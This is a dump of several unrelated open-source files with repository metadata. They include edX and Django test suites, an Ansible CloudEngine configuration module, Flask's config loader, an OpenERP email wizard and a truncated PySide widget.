repo_name (string, 5–100 chars) | ref (string, 12–67 chars) | path (string, 4–244 chars) | copies (string, 1–8 chars) | content (string, 0–1.05M chars, nullable)
---|---|---|---|---|
chrisfilda/edx_platform
|
refs/heads/master
|
lms/djangoapps/staticbook/tests.py
|
8
|
"""
Test the lms/staticbook views.
"""
import textwrap
import mock
import requests
from django.test.utils import override_settings
from django.core.urlresolvers import reverse, NoReverseMatch
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
from student.tests.factories import UserFactory, CourseEnrollmentFactory
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
IMAGE_BOOK = ("An Image Textbook", "http://example.com/the_book/")
PDF_BOOK = {
"tab_title": "Textbook",
"title": "A PDF Textbook",
"chapters": [
{"title": "Chapter 1 for PDF", "url": "https://somehost.com/the_book/chap1.pdf"},
{"title": "Chapter 2 for PDF", "url": "https://somehost.com/the_book/chap2.pdf"},
],
}
PORTABLE_PDF_BOOK = {
"tab_title": "Textbook",
"title": "A PDF Textbook",
"chapters": [
{"title": "Chapter 1 for PDF", "url": "/static/chap1.pdf"},
{"title": "Chapter 2 for PDF", "url": "/static/chap2.pdf"},
],
}
HTML_BOOK = {
"tab_title": "Textbook",
"title": "An HTML Textbook",
"chapters": [
{"title": "Chapter 1 for HTML", "url": "https://somehost.com/the_book/chap1.html"},
{"title": "Chapter 2 for HTML", "url": "https://somehost.com/the_book/chap2.html"},
],
}
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class StaticBookTest(ModuleStoreTestCase):
"""
Helpers for the static book tests.
"""
def __init__(self, *args, **kwargs):
super(StaticBookTest, self).__init__(*args, **kwargs)
self.course = None
def make_course(self, **kwargs):
"""
Make a course with an enrolled logged-in student.
"""
self.course = CourseFactory.create(**kwargs)
user = UserFactory.create()
CourseEnrollmentFactory.create(user=user, course_id=self.course.id)
self.client.login(username=user.username, password='test')
def make_url(self, url_name, **kwargs):
"""
Make a URL for a `url_name` using keyword args for url slots.
Automatically provides the course id.
"""
kwargs['course_id'] = self.course.id
url = reverse(url_name, kwargs=kwargs)
return url
class StaticImageBookTest(StaticBookTest):
"""
Test the image-based static book view.
"""
def test_book(self):
# We can access a book.
with mock.patch.object(requests, 'get') as mock_get:
mock_get.return_value.text = textwrap.dedent('''\
<?xml version="1.0"?>
<table_of_contents>
<entry page="9" page_label="ix" name="Contents!?"/>
<entry page="1" page_label="i" name="Preamble">
<entry page="4" page_label="iv" name="About the Elephants"/>
</entry>
</table_of_contents>
''')
self.make_course(textbooks=[IMAGE_BOOK])
url = self.make_url('book', book_index=0)
response = self.client.get(url)
self.assertContains(response, "Contents!?")
self.assertContains(response, "About the Elephants")
def test_bad_book_id(self):
# A non-integer book id won't reverse to a URL.
self.make_course(textbooks=[IMAGE_BOOK])
with self.assertRaises(NoReverseMatch):
self.make_url('book', book_index='fooey')
def test_out_of_range_book_id(self):
self.make_course()
url = self.make_url('book', book_index=0)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_bad_page_id(self):
# A non-integer page id won't reverse to a URL.
self.make_course(textbooks=[IMAGE_BOOK])
with self.assertRaises(NoReverseMatch):
self.make_url('book', book_index=0, page='xyzzy')
class StaticPdfBookTest(StaticBookTest):
"""
Test the PDF static book view.
"""
def test_book(self):
# We can access a book.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=0)
response = self.client.get(url)
self.assertContains(response, "Chapter 1 for PDF")
self.assertNotContains(response, "options.chapterNum =")
self.assertNotContains(response, "page=")
def test_book_chapter(self):
# We can access a book at a particular chapter.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=0, chapter=2)
response = self.client.get(url)
self.assertContains(response, "Chapter 2 for PDF")
self.assertContains(response, "file={}".format(PDF_BOOK['chapters'][1]['url']))
self.assertNotContains(response, "page=")
def test_book_page(self):
# We can access a book at a particular page.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=0, page=17)
response = self.client.get(url)
self.assertContains(response, "Chapter 1 for PDF")
self.assertNotContains(response, "options.chapterNum =")
self.assertContains(response, "page=17")
def test_book_chapter_page(self):
# We can access a book at a particular chapter and page.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=0, chapter=2, page=17)
response = self.client.get(url)
self.assertContains(response, "Chapter 2 for PDF")
self.assertContains(response, "file={}".format(PDF_BOOK['chapters'][1]['url']))
self.assertContains(response, "page=17")
def test_bad_book_id(self):
# If the book id isn't an int, the URL won't reverse.
self.make_course(pdf_textbooks=[PDF_BOOK])
with self.assertRaises(NoReverseMatch):
self.make_url('pdf_book', book_index='fooey', chapter=1)
def test_out_of_range_book_id(self):
# If we have one book, asking for the second book will fail with a 404.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=1, chapter=1)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_no_book(self):
# If we have no books, asking for the first book will fail with a 404.
self.make_course()
url = self.make_url('pdf_book', book_index=0, chapter=1)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_chapter_xss(self):
# The chapter in the URL used to go right on the page.
self.make_course(pdf_textbooks=[PDF_BOOK])
# It's no longer possible to use a non-integer chapter.
with self.assertRaises(NoReverseMatch):
self.make_url('pdf_book', book_index=0, chapter='xyzzy')
def test_page_xss(self):
# The page in the URL used to go right on the page.
self.make_course(pdf_textbooks=[PDF_BOOK])
# It's no longer possible to use a non-integer page.
with self.assertRaises(NoReverseMatch):
self.make_url('pdf_book', book_index=0, page='xyzzy')
def test_chapter_page_xss(self):
# The page in the URL used to go right on the page.
self.make_course(pdf_textbooks=[PDF_BOOK])
# It's no longer possible to use a non-integer page and a non-integer chapter.
with self.assertRaises(NoReverseMatch):
self.make_url('pdf_book', book_index=0, chapter='fooey', page='xyzzy')
def test_static_url_map_contentstore(self):
"""
This ensures static URL mapping happens properly for
a course that uses the contentstore.
"""
self.make_course(pdf_textbooks=[PORTABLE_PDF_BOOK])
url = self.make_url('pdf_book', book_index=0, chapter=1)
response = self.client.get(url)
self.assertNotContains(response, 'file={}'.format(PORTABLE_PDF_BOOK['chapters'][0]['url']))
self.assertContains(response, 'file=/c4x/{0.org}/{0.course}/asset/{1}'.format(
self.course.location,
PORTABLE_PDF_BOOK['chapters'][0]['url'].replace('/static/', '')))
def test_static_url_map_static_asset_path(self):
"""
Like above, but used when the course has set a static_asset_path
"""
self.make_course(pdf_textbooks=[PORTABLE_PDF_BOOK], static_asset_path='awesomesauce')
url = self.make_url('pdf_book', book_index=0, chapter=1)
response = self.client.get(url)
self.assertNotContains(response, 'file={}'.format(PORTABLE_PDF_BOOK['chapters'][0]['url']))
self.assertNotContains(response, 'file=/c4x/{0.org}/{0.course}/asset/{1}'.format(
self.course.location,
PORTABLE_PDF_BOOK['chapters'][0]['url'].replace('/static/', '')))
self.assertContains(response, 'file=/static/awesomesauce/{}'.format(
PORTABLE_PDF_BOOK['chapters'][0]['url'].replace('/static/', '')))
class StaticHtmlBookTest(StaticBookTest):
"""
Test the HTML static book view.
"""
def test_book(self):
# We can access a book.
self.make_course(html_textbooks=[HTML_BOOK])
url = self.make_url('html_book', book_index=0)
response = self.client.get(url)
self.assertContains(response, "Chapter 1 for HTML")
self.assertNotContains(response, "options.chapterNum =")
def test_book_chapter(self):
# We can access a book at a particular chapter.
self.make_course(html_textbooks=[HTML_BOOK])
url = self.make_url('html_book', book_index=0, chapter=2)
response = self.client.get(url)
self.assertContains(response, "Chapter 2 for HTML")
self.assertContains(response, "options.chapterNum = 2;")
def test_bad_book_id(self):
# If we have one book, asking for the second book will fail with a 404.
self.make_course(html_textbooks=[HTML_BOOK])
url = self.make_url('html_book', book_index=1, chapter=1)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_no_book(self):
# If we have no books, asking for the first book will fail with a 404.
self.make_course()
url = self.make_url('html_book', book_index=0, chapter=1)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_chapter_xss(self):
# The chapter in the URL used to go right on the page.
self.make_course(html_textbooks=[HTML_BOOK])
# It's no longer possible to use a non-integer chapter.
with self.assertRaises(NoReverseMatch):
self.make_url('html_book', book_index=0, chapter='xyzzy')
|
takeflight/django
|
refs/heads/master
|
django/contrib/redirects/tests.py
|
112
|
from django import http
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, modify_settings, override_settings
from django.utils import six
from .middleware import RedirectFallbackMiddleware
from .models import Redirect
@modify_settings(MIDDLEWARE_CLASSES={'append':
'django.contrib.redirects.middleware.RedirectFallbackMiddleware'})
@override_settings(APPEND_SLASH=False, SITE_ID=1)
class RedirectTests(TestCase):
def setUp(self):
self.site = Site.objects.get(pk=settings.SITE_ID)
def test_model(self):
r1 = Redirect.objects.create(
site=self.site, old_path='/initial', new_path='/new_target')
self.assertEqual(six.text_type(r1), "/initial ---> /new_target")
def test_redirect(self):
Redirect.objects.create(
site=self.site, old_path='/initial', new_path='/new_target')
response = self.client.get('/initial')
self.assertRedirects(response,
'/new_target', status_code=301, target_status_code=404)
@override_settings(APPEND_SLASH=True)
def test_redirect_with_append_slash(self):
Redirect.objects.create(
site=self.site, old_path='/initial/', new_path='/new_target/')
response = self.client.get('/initial')
self.assertRedirects(response,
'/new_target/', status_code=301, target_status_code=404)
@override_settings(APPEND_SLASH=True)
def test_redirect_with_append_slash_and_query_string(self):
Redirect.objects.create(
site=self.site, old_path='/initial/?foo', new_path='/new_target/')
response = self.client.get('/initial?foo')
self.assertRedirects(response,
'/new_target/', status_code=301, target_status_code=404)
def test_response_gone(self):
"""When the redirect target is '', return a 410"""
Redirect.objects.create(
site=self.site, old_path='/initial', new_path='')
response = self.client.get('/initial')
self.assertEqual(response.status_code, 410)
@modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'})
def test_sites_not_installed(self):
with self.assertRaises(ImproperlyConfigured):
RedirectFallbackMiddleware()
class OverriddenRedirectFallbackMiddleware(RedirectFallbackMiddleware):
# Use HTTP responses different from the defaults
response_gone_class = http.HttpResponseForbidden
response_redirect_class = http.HttpResponseRedirect
@modify_settings(MIDDLEWARE_CLASSES={'append':
'django.contrib.redirects.tests.OverriddenRedirectFallbackMiddleware'})
@override_settings(SITE_ID=1)
class OverriddenRedirectMiddlewareTests(TestCase):
def setUp(self):
self.site = Site.objects.get(pk=settings.SITE_ID)
def test_response_gone_class(self):
Redirect.objects.create(
site=self.site, old_path='/initial/', new_path='')
response = self.client.get('/initial/')
self.assertEqual(response.status_code, 403)
def test_response_redirect_class(self):
Redirect.objects.create(
site=self.site, old_path='/initial/', new_path='/new_target/')
response = self.client.get('/initial/')
self.assertEqual(response.status_code, 302)
|
tedelhourani/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/cloudengine/ce_config.py
|
27
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: ce_config
version_added: "2.4"
author: "QijunPan (@CloudEngine-Ansible)"
short_description: Manage Huawei CloudEngine configuration sections.
description:
- Huawei CloudEngine configurations use a simple block indent file syntax
for segmenting configuration into sections. This module provides
an implementation for working with CloudEngine configuration sections in
a deterministic way. This module works with CLI transports.
options:
lines:
description:
- The ordered set of commands that should be configured in the
section. The commands must be the exact same commands as found
in the device current-configuration. Be sure to note the configuration
command syntax as some commands are automatically modified by the
device config parser.
required: false
default: null
parents:
description:
- The ordered set of parents that uniquely identify the section
the commands should be checked against. If the parents argument
is omitted, the commands are checked against the set of top
level or global commands.
required: false
default: null
src:
description:
- The I(src) argument provides a path to the configuration file
to load into the remote system. The path can either be a full
system path to the configuration file if the value starts with /
or relative to the root of the implemented role or playbook.
This argument is mutually exclusive with the I(lines) and
I(parents) arguments.
required: false
default: null
before:
description:
- The ordered set of commands to push on to the command stack if
a change needs to be made. This allows the playbook designer
the opportunity to perform configuration commands prior to pushing
any changes without affecting how the set of commands are matched
against the system.
required: false
default: null
after:
description:
- The ordered set of commands to append to the end of the command
stack if a change needs to be made. Just like with I(before) this
allows the playbook designer to append a set of commands to be
executed after the command set.
required: false
default: null
match:
description:
- Instructs the module on the way to perform the matching of
the set of commands against the current device config. If
match is set to I(line), commands are matched line by line. If
match is set to I(strict), command lines are matched with respect
to position. If match is set to I(exact), command lines
must be an equal match. Finally, if match is set to I(none), the
module will not attempt to compare the source configuration with
the current-configuration on the remote device.
required: false
default: line
choices: ['line', 'strict', 'exact', 'none']
replace:
description:
- Instructs the module on the way to perform the configuration
on the device. If the replace argument is set to I(line) then
the modified lines are pushed to the device in configuration
mode. If the replace argument is set to I(block) then the entire
command block is pushed to the device in configuration mode if any
line is not correct.
required: false
default: line
choices: ['line', 'block']
backup:
description:
- This argument will cause the module to create a full backup of
the current C(current-configuration) from the remote device before any
changes are made. The backup file is written to the C(backup)
folder in the playbook root directory. If the directory does not
exist, it is created.
required: false
type: bool
default: false
config:
description:
- The module, by default, will connect to the remote device and
retrieve the current current-configuration to use as a base for comparing
against the contents of source. There are times when it is not
desirable to have the task get the current-configuration for
every task in a playbook. The I(config) argument allows the
implementer to pass in the configuration to use as the base
config for comparison.
required: false
default: null
defaults:
description:
- The I(defaults) argument will influence how the current-configuration
is collected from the device. When the value is set to true,
the command used to collect the current-configuration is appended with
the all keyword. When the value is set to false, the command
is issued without the all keyword.
required: false
type: bool
default: false
save:
description:
- The C(save) argument instructs the module to save the
current-configuration to saved-configuration. This operation is performed
after any changes are made to the current running config. If
no changes are made, the configuration is still saved to the
startup config. This option will always cause the module to
return changed.
required: false
type: bool
default: false
"""
EXAMPLES = """
# Note: examples below use the following provider dict to handle
# transport and authentication to the node.
- name: CloudEngine config test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Configure top level configuration and save it"
ce_config:
lines: sysname {{ inventory_hostname }}
save: yes
provider: "{{ cli }}"
- name: "Configure acl configuration and save it"
ce_config:
lines:
- rule 10 permit source 1.1.1.1 32
- rule 20 permit source 2.2.2.2 32
- rule 30 permit source 3.3.3.3 32
- rule 40 permit source 4.4.4.4 32
- rule 50 permit source 5.5.5.5 32
parents: acl 2000
before: undo acl 2000
match: exact
provider: "{{ cli }}"
- name: "Configure acl configuration and save it"
ce_config:
lines:
- rule 10 permit source 1.1.1.1 32
- rule 20 permit source 2.2.2.2 32
- rule 30 permit source 3.3.3.3 32
- rule 40 permit source 4.4.4.4 32
parents: acl 2000
before: undo acl 2000
replace: block
provider: "{{ cli }}"
"""
RETURN = """
updates:
description: The set of commands that will be pushed to the remote device
returned: Only when lines is specified.
type: list
sample: ['...', '...']
backup_path:
description: The full path to the backup file
returned: when backup is yes
type: string
sample: /playbooks/ansible/backup/ce_config.2016-07-16@22:28:34
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.netcfg import NetworkConfig, dumps
from ansible.module_utils.ce import get_config, load_config, run_commands
from ansible.module_utils.ce import ce_argument_spec
from ansible.module_utils.ce import check_args as ce_check_args
def check_args(module, warnings):
ce_check_args(module, warnings)
def get_running_config(module):
contents = module.params['config']
if not contents:
flags = []
if module.params['defaults']:
flags.append('include-default')
contents = get_config(module, flags=flags)
return NetworkConfig(indent=1, contents=contents)
def get_candidate(module):
candidate = NetworkConfig(indent=1)
if module.params['src']:
candidate.load(module.params['src'])
elif module.params['lines']:
parents = module.params['parents'] or list()
candidate.add(module.params['lines'], parents=parents)
return candidate
def run(module, result):
match = module.params['match']
replace = module.params['replace']
candidate = get_candidate(module)
if match != 'none':
config = get_running_config(module)
path = module.params['parents']
configobjs = candidate.difference(config, match=match, replace=replace, path=path)
else:
configobjs = candidate.items
if configobjs:
commands = dumps(configobjs, 'commands').split('\n')
if module.params['lines']:
if module.params['before']:
commands[:0] = module.params['before']
if module.params['after']:
commands.extend(module.params['after'])
result['commands'] = commands
result['updates'] = commands
if not module.check_mode:
load_config(module, commands)
result['changed'] = True
def main():
""" main entry point for module execution
"""
argument_spec = dict(
src=dict(type='path'),
lines=dict(aliases=['commands'], type='list'),
parents=dict(type='list'),
before=dict(type='list'),
after=dict(type='list'),
match=dict(default='line', choices=['line', 'strict', 'exact', 'none']),
replace=dict(default='line', choices=['line', 'block']),
config=dict(),
defaults=dict(type='bool', default=False),
backup=dict(type='bool', default=False),
save=dict(type='bool', default=False),
)
argument_spec.update(ce_argument_spec)
mutually_exclusive = [('lines', 'src')]
required_if = [('match', 'strict', ['lines']),
('match', 'exact', ['lines']),
('replace', 'block', ['lines'])]
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
required_if=required_if,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = dict(changed=False, warnings=warnings)
if module.params['backup']:
result['__backup__'] = get_config(module)
if any((module.params['src'], module.params['lines'])):
run(module, result)
if module.params['save']:
if not module.check_mode:
run_commands(module, ['save'])
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
ademilly/waterflow
|
refs/heads/master
|
waterflow/__init__.py
|
1
|
"""dataflow package provides a framework to build data analysis pipeline
class:
Flow -- main class for the dataflow package ;
provides functionnal tools to transform a dataset
and do machine learning with it
"""
from flow import Flow
from ml import ML
from source import Source
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
__all__ = ['Flow', 'ML', 'Source']
|
jmcarbo/openerp8-addons
|
refs/heads/master
|
project_scrum/wizard/project_scrum_email.py
|
5
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
from datetime import datetime
from openerp import tools
class project_scrum_email(osv.osv_memory):
_name = 'project.scrum.email'
def default_get(self, cr, uid, fields, context=None):
"""
This function gets default values
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param fields: List of fields for default value
@param context: A standard dictionary for contextual values
@return : default values of fields.
"""
if context is None:
context = {}
meeting_pool = self.pool.get('project.scrum.meeting')
record_ids = context and context.get('active_ids', []) or []
res = super(project_scrum_email, self).default_get(cr, uid, fields, context=context)
for meeting in meeting_pool.browse(cr, uid, record_ids, context=context):
sprint = meeting.sprint_id
if 'scrum_master_email' in fields:
res.update({'scrum_master_email': sprint.scrum_master_id and sprint.scrum_master_id.user_email or False})
if 'product_owner_email' in fields:
res.update({'product_owner_email': sprint.product_owner_id and sprint.product_owner_id.user_email or False})
if 'subject' in fields:
subject = _("Scrum Meeting : %s") %(meeting.date)
res.update({'subject': subject})
if 'message' in fields:
message = _("Hello , \nI am sending you Scrum Meeting : %s for the Sprint '%s' of Project '%s' ") %(meeting.date, sprint.name, sprint.project_id)
#message = _("Hello , \nI am sending you Scrum Meeting")
res.update({'message': message})
return res
_columns = {
'scrum_master_email': fields.char('Scrum Master Email', size=64, help="Email Id of Scrum Master"),
'product_owner_email': fields.char('Product Owner Email', size=64, help="Email Id of Product Owner"),
'subject':fields.char('Subject', size=64),
'message':fields.text('Message'),
}
def button_send_scrum_email(self, cr, uid, ids, context=None):
if context is None:
context = {}
active_id = context.get('active_id', False)
scrum_meeting_pool = self.pool.get('project.scrum.meeting')
user_pool = self.pool.get('res.users')
meeting = scrum_meeting_pool.browse(cr, uid, active_id, context=context)
# wizard data
data_id = ids and ids[0] or False
if not data_id or not active_id:
return False
data = self.browse(cr, uid, data_id, context=context)
email_from = tools.config.get('email_from', False)
user = user_pool.browse(cr, uid, uid, context=context)
#BUG: in v7 address_id does not exist; today it's alias_id, but we don't find the address in the db
user_email = email_from or user.alias_id.email
body = "%s\n" %(data.message)
body += "\n%s\n" %_('Tasks since yesterday')
body += "_______________________\n"
body += "\n%s\n" %(meeting.question_yesterday or _('None'))
body += "\n%s\n" %_("Task for Today")
body += "_______________________ \n"
body += "\n%s\n" %(meeting.question_today or _('None'))
body += "\n%s\n" % _('Blocking points encountered:')
body += "_______________________ \n"
body += "\n%s\n" %(meeting.question_blocks or _('None'))
body += "\n%s\n%s" %(_('Thank you,'), user.name)
if user.signature:
body += "\n%s" %(user.signature)
if data.scrum_master_email == data.product_owner_email:
data.product_owner_email = False
if data.scrum_master_email:
tools.email_send(user_email, [data.scrum_master_email], data.subject, body, reply_to=user_email)
if data.product_owner_email:
tools.email_send(user_email, [data.product_owner_email], data.subject, body, reply_to=user_email)
return {'type': 'ir.actions.act_window_close'}
project_scrum_email()
|
slisson/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyArgumentListInspection/dictFromKeys.py
|
52
|
print(dict.fromkeys(<warning descr="Parameter 'seq' unfilled">)</warning>)
print(dict.fromkeys(['foo', 'bar']))
|
fahrrad/pythonchallenge
|
refs/heads/master
|
2.py
|
1
|
from_a = 'abcdefghijklmnopqrstuvwxyz'
to_a = 'cdefghijklmnopqrstuvwxyzab'
s = """g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj."""
d = str.maketrans(from_a, to_a)
print (str.translate(s,d))
print (str.translate('map', d))
|
apocalypsebg/odoo
|
refs/heads/8.0
|
addons/l10n_ar/__openerp__.py
|
260
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Cubic ERP - Teradata SAC (<http://cubicerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Argentina Localization Chart Account',
'version': '1.0',
'description': """
Argentinian accounting chart and tax localization.
==================================================
Plan contable argentino e impuestos de acuerdo a disposiciones vigentes
""",
'author': ['Cubic ERP'],
'website': 'http://cubicERP.com',
'category': 'Localization/Account Charts',
'depends': ['account_chart'],
'data':[
'account_tax_code.xml',
'l10n_ar_chart.xml',
'account_tax.xml',
'l10n_ar_wizard.xml',
],
'demo': [],
'active': False,
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
georgeriz/myFlaskBackend
|
refs/heads/master
|
lib/flask/config.py
|
781
|
# -*- coding: utf-8 -*-
"""
flask.config
~~~~~~~~~~~~
Implements the configuration related objects.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import imp
import os
import errno
from werkzeug.utils import import_string
from ._compat import string_types
class ConfigAttribute(object):
"""Makes an attribute forward to the config"""
def __init__(self, name, get_converter=None):
self.__name__ = name
self.get_converter = get_converter
def __get__(self, obj, type=None):
if obj is None:
return self
rv = obj.config[self.__name__]
if self.get_converter is not None:
rv = self.get_converter(rv)
return rv
def __set__(self, obj, value):
obj.config[self.__name__] = value
class Config(dict):
"""Works exactly like a dict but provides ways to fill it from files
or special dictionaries. There are two common patterns to populate the
config.
Either you can fill the config from a config file::
app.config.from_pyfile('yourconfig.cfg')
Or alternatively you can define the configuration options in the
module that calls :meth:`from_object` or provide an import path to
a module that should be loaded. It is also possible to tell it to
use the same module and with that provide the configuration values
just before the call::
DEBUG = True
SECRET_KEY = 'development key'
app.config.from_object(__name__)
In both cases (loading from any Python file or loading from modules),
only uppercase keys are added to the config. This makes it possible to use
lowercase values in the config file for temporary values that are not added
to the config or to define the config keys in the same file that implements
the application.
Probably the most interesting way to load configurations is from an
environment variable pointing to a file::
app.config.from_envvar('YOURAPPLICATION_SETTINGS')
In this case before launching the application you have to set this
environment variable to the file you want to use. On Linux and OS X
use the export statement::
export YOURAPPLICATION_SETTINGS='/path/to/config/file'
On Windows, use `set` instead.
:param root_path: path to which files are read relative from. When the
config object is created by the application, this is
the application's :attr:`~flask.Flask.root_path`.
:param defaults: an optional dictionary of default values
"""
def __init__(self, root_path, defaults=None):
dict.__init__(self, defaults or {})
self.root_path = root_path
def from_envvar(self, variable_name, silent=False):
"""Loads a configuration from an environment variable pointing to
a configuration file. This is basically just a shortcut with nicer
error messages for this line of code::
app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS'])
:param variable_name: name of the environment variable
:param silent: set to `True` if you want silent failure for missing
files.
:return: bool. `True` if able to load config, `False` otherwise.
"""
rv = os.environ.get(variable_name)
if not rv:
if silent:
return False
raise RuntimeError('The environment variable %r is not set '
'and as such configuration could not be '
'loaded. Set this variable and make it '
'point to a configuration file' %
variable_name)
return self.from_pyfile(rv, silent=silent)
def from_pyfile(self, filename, silent=False):
"""Updates the values in the config from a Python file. This function
behaves as if the file was imported as module with the
:meth:`from_object` function.
:param filename: the filename of the config. This can either be an
absolute filename or a filename relative to the
root path.
:param silent: set to `True` if you want silent failure for missing
files.
.. versionadded:: 0.7
`silent` parameter.
"""
filename = os.path.join(self.root_path, filename)
d = imp.new_module('config')
d.__file__ = filename
try:
with open(filename) as config_file:
exec(compile(config_file.read(), filename, 'exec'), d.__dict__)
except IOError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR):
return False
e.strerror = 'Unable to load configuration file (%s)' % e.strerror
raise
self.from_object(d)
return True
def from_object(self, obj):
"""Updates the values from the given object. An object can be of one
of the following two types:
- a string: in this case the object with that name will be imported
- an actual object reference: that object is used directly
Objects are usually either modules or classes.
Just the uppercase variables in that object are stored in the config.
Example usage::
app.config.from_object('yourapplication.default_config')
from yourapplication import default_config
app.config.from_object(default_config)
You should not use this function to load the actual configuration but
rather configuration defaults. The actual config should be loaded
with :meth:`from_pyfile` and ideally from a location not within the
package because the package might be installed system wide.
:param obj: an import name or object
"""
if isinstance(obj, string_types):
obj = import_string(obj)
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, dict.__repr__(self))
|
clejeu03/EWP
|
refs/heads/master
|
view/sketchViewModule/SketchBoardView.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from PySide import QtGui, QtCore
from view.sketchViewModule.Track import Track
from view.sketchViewModule.SketchList import SketchList
class SketchBoardView (QtGui.QWidget):
def __init__(self, app, sessionView):
super(SketchBoardView, self).__init__()
self._app = app
self._model = app.getSession().currentProject()
self._sessionView = sessionView
self.setAcceptDrops(True)
self._toolbar = None
self._trackList = None
self._stackedWidget = None
self._videoTrackTable = {}
# /!\ Note: self._videoTrackTable is a dict where the keys are the widgets contained in QListWidgetItems and the values
# are the videos that were used for the widget creation. Why? Because each widget is unique whereas a video can appear multiple
# times in the container. Since Python dict keys must be unique, THE WIDGETS ARE THE KEYS.
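# A minimal illustration of this mapping (the widget and video names are hypothetical):
#   self._videoTrackTable = {track_widget_1: video_a, track_widget_2: video_a}
# Looking a track up by its widget stays unambiguous even when the same video backs several tracks.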
self.init()
def init(self):
""" Initialize the widget """
#Init the toolbar
self._toolbar = self.initToolbar()
#Init the main widget : the list
self._trackList = SketchList()
#Setting up the layout
layout = QtGui.QVBoxLayout()
self._stackedWidget = QtGui.QStackedWidget()
self._stackedWidget.addWidget(self.createEmptyProjectWidget())
self._stackedWidget.addWidget(self._trackList)
layout.addWidget(self._toolbar)
layout.addWidget(self._stackedWidget)
self.setLayout(layout)
#Display tracks if there are any, or the empty widget
self.update()
def initToolbar(self):
"""
Creates the toolbar and the actions that go in it, and makes the necessary connections
:return type: QToolBar
"""
toolbar = QtGui.QToolBar()
#TODO: manage the enable/disable of the actions
#Actions
self.addVideoAction = QtGui.QAction(self.tr("&Add Video"), self)
self.addVideoAction.setStatusTip(self.tr("Add a video to the sketch board"))
#self.addVideoAction.setDisabled()
self.connect(self.addVideoAction, QtCore.SIGNAL("triggered()"), self, QtCore.SLOT("addVideo()"))
self.suppressVideoAction = QtGui.QAction(self.tr("&Remove Video"), self)
self.suppressVideoAction.setStatusTip(self.tr("Remove the selected video from the sketch board"))
#self.suppressVideoAction.setDisabled()
self.connect(self.suppressVideoAction, QtCore.SIGNAL("triggered()"), self, QtCore.SLOT("suppressVideo()"))
toolbar.addAction(self.addVideoAction)
toolbar.addAction(self.suppressVideoAction)
return toolbar
def createEmptyProjectWidget(self):
